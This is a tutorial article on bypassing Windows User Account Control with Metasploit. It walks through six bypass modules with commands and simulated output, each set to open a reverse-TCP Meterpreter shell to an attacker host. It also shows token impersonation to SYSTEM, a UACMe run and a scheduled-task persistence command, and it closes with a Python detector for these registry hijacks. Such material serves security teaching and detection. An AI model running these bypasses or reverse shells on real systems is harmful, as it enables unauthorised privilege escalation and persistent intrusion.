Bypassing UAC on Windows Using Metasploit - A Complete Guide for Cybersecurity Professionals
Introduction
User Account Control (UAC) is a security feature in modern Windows operating systems designed to prevent unauthorized changes. When malware or an attacker gains initial access to a Windows machine, they usually have limited privileges. To execute high-impact actions—like installing drivers, disabling antivirus, or altering system settings—privilege escalation is necessary.
One common target for privilege escalation is bypassing UAC.
In this article, we will explore:
- What UAC is and how it works
- How to bypass UAC using Metasploit
- In-depth walkthroughs of multiple Metasploit UAC bypass modules
- Simulated command outputs
- Manual methods like DLL hijacking, token impersonation
- Educational warnings and ethical guidance
📢DISCLAIMER: This content is for educational purposes only. It is intended to educate cybersecurity professionals and students at The Geek Institute of Cyber Security. Unauthorized usage of these techniques on machines you do not own or have permission to test is illegal.
What is User Account Control (UAC)?
UAC is a Windows feature that helps prevent unauthorized changes by prompting the user for permission or admin credentials before allowing tasks that require elevated privileges.
- Introduced in: Windows Vista and later
- Runs under: User's security token (standard by default)
- Elevation required for: Installing software, modifying system files, running administrative tools
UAC restricts malware and unauthorized apps from silently installing or changing system settings without your knowledge. Note that at its default level ("Notify me only when apps try to make changes") UAC silently auto-elevates certain signed Microsoft binaries; that silent auto-elevation is what every bypass below abuses, and the "Always notify" level prompts for those binaries as well.
Why Bypass UAC?
Attackers and red teamers often bypass UAC to:
- Obtain a high-integrity (elevated administrator) token, the stepping stone to SYSTEM-level access
- Disable or evade antivirus
- Add persistence mechanisms
- Modify system configurations
- Dump credentials
Metasploit Framework and UAC Bypass
Metasploit is a penetration testing platform that contains multiple post-exploitation modules to bypass UAC using known techniques.
You can search for available UAC bypass modules by running:
msf6 > search bypassuac
Sample Output:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/bypassuac 2017-05-17 excellent Windows Escalate UAC Protection Bypass
exploit/windows/local/bypassuac_fodhelper excellent Windows 10 UAC Bypass (Fodhelper)
exploit/windows/local/bypassuac_sluihijack excellent Windows 10 UAC Bypass (slui)
exploit/windows/local/bypassuac_eventvwr excellent UAC Bypass Using eventvwr.exe
exploit/windows/local/bypassuac_sdclt excellent Windows 10 UAC Bypass (sdclt)
exploit/windows/local/bypassuac_comhijack excellent Windows UAC COM Handler Hijack
Complete UAC Bypass Techniques via Metasploit
Let’s go through each module step-by-step with:
- Use case
- Execution process
- Commands
- Simulated outputs
- Post-exploitation result
1. bypassuac_fodhelper
Description: Leverages fodhelper.exe, a trusted Windows binary that auto-elevates without a UAC prompt and that consults per-user (HKCU) registry keys which a standard user is allowed to modify.
Metasploit Module:
exploit/windows/local/bypassuac_fodhelper
Steps:
Start a reverse shell or meterpreter session as a low-privileged user.
Background the session:
meterpreter > background
Use the module:
use exploit/windows/local/bypassuac_fodhelper
Set required options:
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
Run:
exploit
Output:
[*] Running module against DESKTOP-USER
[*] Setting registry keys for fodhelper.exe
[*] Launching fodhelper.exe to trigger UAC bypass
[*] Sending stage (175174 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.105:49158)
Result: Privilege escalated Meterpreter session
2. bypassuac_eventvwr
Description: Takes advantage of eventvwr.exe launching mmc.exe, which resolves the handler for .msc snap-in files through a registry key that a standard user can set under HKCU.
Metasploit Module:
exploit/windows/local/bypassuac_eventvwr
Steps:
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4445
exploit
Output:
[*] Launching eventvwr.exe to trigger the UAC bypass
[*] Setting registry key HKCU\Software\Classes\mscfile\shell\open\command
[*] Sending stage (175174 bytes)
[*] Meterpreter session 3 opened with elevated privileges!
3. bypassuac_sluihijack
Description: Uses slui.exe (used for Windows activation) to launch arbitrary elevated commands.
use exploit/windows/local/bypassuac_sluihijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4446
exploit
Output:
[*] Hijacking HKCU\Software\Classes\exefile\shell\open\command
[*] Launching slui.exe to elevate privileges
[*] Meterpreter session 4 opened as NT AUTHORITY\SYSTEM
4. bypassuac_sdclt
Description: Targets sdclt.exe (the Backup & Restore GUI), which calls control.exe, allowing manipulation of the registry for elevation.
use exploit/windows/local/bypassuac_sdclt
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4447
exploit
Output:
[*] Setting HKCU\Software\Classes\exefile\shell\open\command
[*] Executing sdclt.exe
[*] Meterpreter session 5 opened (elevated)
5. bypassuac_comhijack
Description: Hijacks auto-elevated COM objects to execute payloads with administrator rights.
use exploit/windows/local/bypassuac_comhijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4448
exploit
Output:
[*] Creating malicious COM registry keys
[*] Executing COM object
[*] Meterpreter session 6 opened as Administrator
6. bypassuac_dllhijack
Description: Performs DLL hijacking using known auto-elevated executables.
use exploit/windows/local/bypassuac_dllhijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4449
exploit
Output:
[*] Copying DLL to %SYSTEMROOT%\System32
[*] Launching vulnerable executable
[*] Meterpreter session 7 opened with admin privileges
Manual Techniques Beyond Metasploit
In addition to Metasploit, UAC bypass can be done manually:
DLL Hijacking (Manually)
- Identify a trusted executable that loads missing DLLs from the same directory.
- Drop a malicious DLL (same name).
- Launch the trusted EXE.
Token Impersonation
Use incognito in meterpreter:
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
UACMe (Manual UAC Bypass Toolkit)
UACMe is a legitimate research tool for testing bypasses.
.\Akagi64.exe 43
This executes an exploit technique using a built-in Windows binary to elevate privileges without consent.
Persistence with UAC Techniques
Once UAC is bypassed:
- Create a Scheduled Task
- Install a Windows Service
- Add entries in the registry under:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Example using schtasks:
schtasks /create /tn "MyTask" /tr "malicious.exe" /sc onlogon /ru SYSTEM
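As an added detection example (not code from the article or from Metasploit), the following Python scans constructed Sysmon-style telemetry for the per-user registry writes used by modules 1 to 5 above (the ms-settings, mscfile, exefile and CLSID keys under HKCU), pairs each write with a subsequent launch of an auto-elevating binary by the same user, and also flags writes to the Run key named in this persistence section. The record schema (time, event_id, user, image, target) and the sample events are this example's own assumptions.

```python
import re
from datetime import datetime
# Added example (not the article's or Metasploit's code): scans constructed Sysmon-style
# records, Event 13 = registry value set, Event 1 = process create, under an assumed schema.
HIJACK_KEYS = {  # per-user Classes keys the page's modules write; HKCU needs no elevation
    "fodhelper": re.compile(r"\\Classes\\ms-settings\\Shell\\Open\\command", re.I),
    "eventvwr": re.compile(r"\\Classes\\mscfile\\shell\\open\\command", re.I),
    "slui/sdclt": re.compile(r"\\Classes\\exefile\\shell\\open\\command", re.I),
    "comhijack": re.compile(r"\\Classes\\CLSID\\\{[0-9a-f-]+\}\\InprocServer32", re.I),
}
AUTO_ELEVATE = {"fodhelper.exe", "eventvwr.exe", "slui.exe", "sdclt.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)  # persistence key named on the page
_ts = lambda s: datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_uac_bypass_chains(events, window_s=60):
    """Return (severity, technique, user, target). A hijack-key write followed within
    window_s by the same user launching an auto-elevating binary is 'high'; an unpaired
    write, or any Run-key write, is 'medium' for analyst review."""
    alerts = []
    launches = [e for e in events if e["event_id"] == 1
                and e["image"].rsplit("\\", 1)[-1].lower() in AUTO_ELEVATE]
    for e in events:
        if e["event_id"] != 13:
            continue
        if RUN_KEY.search(e["target"]):
            alerts.append(("medium", "run-key persistence", e["user"], e["target"]))
        for name, pat in HIJACK_KEYS.items():
            if pat.search(e["target"]):
                t0 = _ts(e["time"])
                paired = any(l["user"] == e["user"] and
                             0 <= (_ts(l["time"]) - t0).total_seconds() <= window_s
                             for l in launches)
                alerts.append(("high" if paired else "medium", name, e["user"], e["target"]))
    return alerts

# Constructed sample telemetry (not real logs): a fodhelper-style chain by alice, a Run-key
# write by bob, and a benign eventvwr.exe launch by carol with no preceding key write.
HKCU = "HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\"
SAMPLE = [
    {"time": "2024-01-01 10:00:00", "event_id": 13, "user": "LAB\\alice", "image": "reg.exe",
     "target": HKCU + "ms-settings\\Shell\\Open\\command\\DelegateExecute"},
    {"time": "2024-01-01 10:00:01", "event_id": 13, "user": "LAB\\alice", "image": "reg.exe",
     "target": HKCU + "ms-settings\\Shell\\Open\\command\\(Default)"},
    {"time": "2024-01-01 10:00:03", "event_id": 1, "user": "LAB\\alice", "target": "",
     "image": "C:\\Windows\\System32\\fodhelper.exe"},
    {"time": "2024-01-01 10:05:00", "event_id": 13, "user": "LAB\\bob", "image": "reg.exe",
     "target": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"time": "2024-01-01 11:00:00", "event_id": 1, "user": "LAB\\carol", "target": "",
     "image": "C:\\Windows\\System32\\eventvwr.exe"},
]
```

Running `find_uac_bypass_chains(SAMPLE)` yields two high-severity fodhelper alerts for alice and one medium Run-key alert for bob; carol's lone eventvwr.exe launch produces nothing, since the key write is what distinguishes a bypass from normal use.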
Key Concepts Recap
| Term | Meaning |
|---|---|
| UAC | Stops unapproved admin actions |
| Auto-elevated binary | Windows file that bypasses UAC silently |
| DLL Hijack | Abusing DLL search order |
| COM Hijack | Redirecting class instantiation via registry |
| Token Impersonation | Adopting another user's access token |
Ethical Reminder
- Always obtain written permission before testing these methods.
- Limit activities to lab environments.
- Use these techniques only for education or authorized engagements.
Conclusion
Bypassing UAC is an important technique in post-exploitation scenarios. Using Metasploit simplifies these attacks, but understanding the inner workings of each technique helps you become a more capable penetration tester or red team operator.